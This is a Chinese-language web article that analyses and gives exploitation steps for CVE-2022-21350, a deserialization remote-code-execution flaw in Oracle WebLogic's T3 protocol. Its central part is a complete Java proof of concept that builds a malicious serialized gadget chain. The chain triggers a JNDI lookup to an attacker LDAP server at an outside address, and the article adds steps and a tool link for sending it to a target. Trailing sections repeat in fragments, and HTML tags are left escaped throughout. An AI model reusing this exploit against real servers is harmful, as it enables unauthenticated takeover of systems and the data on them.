WebLogic T3 RCE漏洞(CVE-2022-21350)分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2022-21350是Oracle WebLogic Server中的一个远程代码执行漏洞，位于Oracle Fusion Middleware的Core组件中。该漏洞允许未经身份验证的攻击者通过T3协议访问网络来破坏Oracle WebLogic Server。<\/p>

影响范围<\/h3>

WebLogic 12.1.3.0.0<\/li>
WebLogic 12.2.1.3.0<\/li>
WebLogic 12.2.1.4.0<\/li>

WebLogic 14.1.1.0.0<\/li> <\/ul>

漏洞危害<\/h3>

成功利用此漏洞可导致：<\/p>

对WebLogic Server可访问数据的未经授权的更新、插入或删除<\/li>

导致WebLogic Server的部分拒绝服务(部分DOS)<\/li> <\/ul>

环境搭建<\/h2>

所需组件<\/h3>

WebLogic Server 12.2.1.4.0<\/li>

JDK 1.8.0_181（注意：JDK版本过高会导致命令执行失败，建议使用JDK < 1.8.191）<\/li> <\/ol>

安装步骤<\/h3>

下载WebLogic安装包：

https:\/\/www.oracle.com\/middleware\/technologies\/weblogic-server-installers-downloads.html
<\/code><\/pre>
<\/li>
执行安装：
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar
<\/span><\/span><\/code><\/pre><\/li>
准备调试环境：

使用java -jar wljarbuilder.jar<\/code>创建wlfullclient.jar<\/code><\/li>
将wlfullclient.jar<\/code>和cryptoj.jar<\/code>放入本地IDEA项目中<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞分析<\/h2>
调用链分析<\/h3>
完整的调用链如下：<\/p>
javax.management.BadAttributeValueExpException.readObject()
    weblogic.servlet.internal.session.SessionData.toString()
        weblogic.servlet.internal.session.SessionData.isDebuggingSession()
            weblogic.servlet.internal.session.SessionData.getAttribute()
                weblogic.servlet.internal.session.SessionData.getAttributeInternal()
                    weblogic.servlet.internal.session.AttributeWrapperUtils.unwrapObject()
                        weblogic.servlet.internal.session.AttributeWrapperUtils.unwrapEJBObjects()
                            weblogic.ejb.container.internal.BusinessHandleImpl.getBusinessObject()
                                weblogic.ejb20.internal.HomeHandleImpl.getEJBHome()
                                    javax.naming.Context.lookup()
<\/code><\/pre>
关键点分析<\/h3>


入口点 - BadAttributeValueExpException.readObject()<\/strong><\/p>

触发toString()<\/code>方法调用<\/li>
通过设置val<\/code>字段为特定对象来控制后续执行流程<\/li>
<\/ul>
<\/li>

SessionData.toString()<\/strong><\/p>

需要绕过isValid()<\/code>检查<\/li>
使用FileSessionData<\/code>作为SessionData<\/code>的实现类<\/li>
<\/ul>
<\/li>

isDebuggingSession()<\/strong><\/p>

远程调试时会跳过registry.isProductionMode()<\/code>检查<\/li>
触发getAttribute("wl_debug_session")<\/code>调用<\/li>
<\/ul>
<\/li>

AttributeWrapperUtils.unwrapObject()<\/strong><\/p>

需要构造AttributeWrapper<\/code>对象<\/li>
设置isEJBObjectWrapped<\/code>为true以进入unwrapEJBObjects()<\/code><\/li>
<\/ul>
<\/li>

BusinessHandleImpl.getBusinessObject()<\/strong><\/p>

需要构造BusinessHandleImpl<\/code>对象<\/li>
通过反射设置homeHandle<\/code>字段<\/li>
<\/ul>
<\/li>

HomeHandleImpl.getEJBHome()<\/strong><\/p>

最终触发JNDI注入点<\/li>
jndiName<\/code>和serverURL<\/code>字段可控<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用<\/h2>
POC构造<\/h3>
package<\/span> com.supeream;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> weblogic.ejb.container.internal.BusinessHandleImpl;<\/span>
<\/span><\/span>import<\/span> weblogic.ejb20.internal.HomeHandleImpl;<\/span>
<\/span><\/span>import<\/span> weblogic.servlet.internal.AttributeWrapper;<\/span>
<\/span><\/span>import<\/span> weblogic.servlet.internal.session.FileSessionData;<\/span>
<\/span><\/span>import<\/span> weblogic.servlet.internal.session.SessionData;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.management.BadAttributeValueExpException;<\/span>
<\/span><\/span>import<\/span> javax.naming.CompoundName;<\/span>
<\/span><\/span>import<\/span> javax.naming.Name;<\/span>
<\/span><\/span>import<\/span> java.io.FileOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>import<\/span> java.util.Properties;<\/span>
<\/span><\/span>import<\/span> java.util.concurrent.ConcurrentHashMap;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> CVE_2022_21350<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 构造HomeHandleImpl,sink点
<\/span><\/span><\/span><\/span>        HomeHandleImpl homeHandle =<\/span> new<\/span> HomeHandleImpl();<\/span>
<\/span><\/span>        Field serverURLF =<\/span> homeHandle.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"serverURL"<\/span>);<\/span>
<\/span><\/span>        serverURLF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        serverURLF.<\/span>set<\/span>(<\/span>homeHandle,<\/span> "t3:\/\/127.0.0.1:7001\/"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Properties props =<\/span> new<\/span> Properties();<\/span>
<\/span><\/span>        Name name =<\/span> new<\/span> CompoundName(<\/span>"ldap:\/\/192.168.1.177:1389\/vntyei"<\/span>,<\/span> props);<\/span>
<\/span><\/span>        Field jndiNameF =<\/span> homeHandle.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"jndiName"<\/span>);<\/span>
<\/span><\/span>        jndiNameF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        jndiNameF.<\/span>set<\/span>(<\/span>homeHandle,<\/span> name);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ homeHandle设置到BusinessHandleImpl
<\/span><\/span><\/span><\/span>        BusinessHandleImpl businessHandle =<\/span> new<\/span> BusinessHandleImpl();<\/span>
<\/span><\/span>        Field homeHandleF =<\/span> businessHandle.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"homeHandle"<\/span>);<\/span>
<\/span><\/span>        homeHandleF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        homeHandleF.<\/span>set<\/span>(<\/span>businessHandle,<\/span> homeHandle);<\/span>
<\/span><\/span>        
<\/span><\/span>        AttributeWrapper attributeWrapper =<\/span> new<\/span> AttributeWrapper(<\/span>businessHandle);<\/span>
<\/span><\/span>        attributeWrapper.<\/span>setEJBObjectWrapped<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Map map =<\/span> new<\/span> ConcurrentHashMap<<\/span>String,<\/span> Object>();<\/span>
<\/span><\/span>        map.<\/span>put<\/span>(<\/span>"wl_debug_session"<\/span>,<\/span> attributeWrapper);<\/span>
<\/span><\/span>        
<\/span><\/span>        SessionData sessionData =<\/span> new<\/span> FileSessionData();<\/span>
<\/span><\/span>        Field attributesF =<\/span> sessionData.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"attributes"<\/span>);<\/span>
<\/span><\/span>        attributesF.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        attributesF.<\/span>set<\/span>(<\/span>sessionData,<\/span> map);<\/span>
<\/span><\/span>        
<\/span><\/span>        BadAttributeValueExpException badAttributeValueExpException =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>        Field field =<\/span> badAttributeValueExpException.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>badAttributeValueExpException,<\/span> sessionData);<\/span>
<\/span><\/span>        
<\/span><\/span>        serialize(<\/span>badAttributeValueExpException);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            ObjectOutputStream os =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"test.ser"<\/span>));<\/span>
<\/span><\/span>            os.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>            os.<\/span>flush<\/span>();<\/span>
<\/span><\/span>            os.<\/span>close<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

使用上述代码生成恶意序列化对象test.ser<\/code><\/li>
通过Python脚本将序列化数据发送到目标WebLogic服务器<\/li>
目标服务器反序列化数据时触发漏洞<\/li>
通过JNDI注入执行远程代码<\/li>
<\/ol>
利用工具<\/h3>
推荐使用Y4er师傅的Python脚本和框架：<\/p>
https:\/\/github.com\/Y4er\/CVE-2020-2555
<\/code><\/pre>
防御措施<\/h2>


官方补丁<\/strong><\/p>

及时应用Oracle发布的安全补丁<\/li>
<\/ul>
<\/li>

临时缓解措施<\/strong><\/p>

禁用T3协议或限制T3协议的访问<\/li>
使用网络ACL限制WebLogic Server的访问<\/li>
<\/ul>
<\/li>

其他建议<\/strong><\/p>

升级到不受影响的WebLogic版本<\/li>
使用JDK 1.8.191或更高版本（但需注意兼容性问题）<\/li>
<\/ul>
<\/li>
<\/ol>
参考链接<\/h2>

https:\/\/www.yuque.com\/docs\/share\/efea1bd4-b0a2-4632-b2a3-e2ae4b1482a9?#vSNs7<\/li>
Oracle官方安全公告<\/li>
<\/ul>

WebLogic T3 RCE漏洞(CVE-2022-21350)分析与利用指南<\/h1>

漏洞概述<\/h2> CVE-2022-21350是Oracle WebLogic Server中的一个远程代码执行漏洞，位于Oracle Fusion Middleware的Core组件中。该漏洞允许未经身份验证的攻击者通过T3协议访问网络来破坏Oracle WebLogic Server。<\/p>

环境搭建<\/h2>

漏洞分析<\/h2>

漏洞利用<\/h2>

参考链接<\/h2> https:\/\/www.yuque.com\/docs\/share\/efea1bd4-b0a2-4632-b2a3-e2ae4b1482a9?#vSNs7<\/li> Oracle官方安全公告<\/li> <\/ul>

漏洞概述<\/h2>
CVE-2022-21350是Oracle WebLogic Server中的一个远程代码执行漏洞，位于Oracle Fusion Middleware的Core组件中。该漏洞允许未经身份验证的攻击者通过T3协议访问网络来破坏Oracle WebLogic Server。<\/p>

参考链接<\/h2>

https:\/\/www.yuque.com\/docs\/share\/efea1bd4-b0a2-4632-b2a3-e2ae4b1482a9?#vSNs7<\/li>
Oracle官方安全公告<\/li> <\/ul>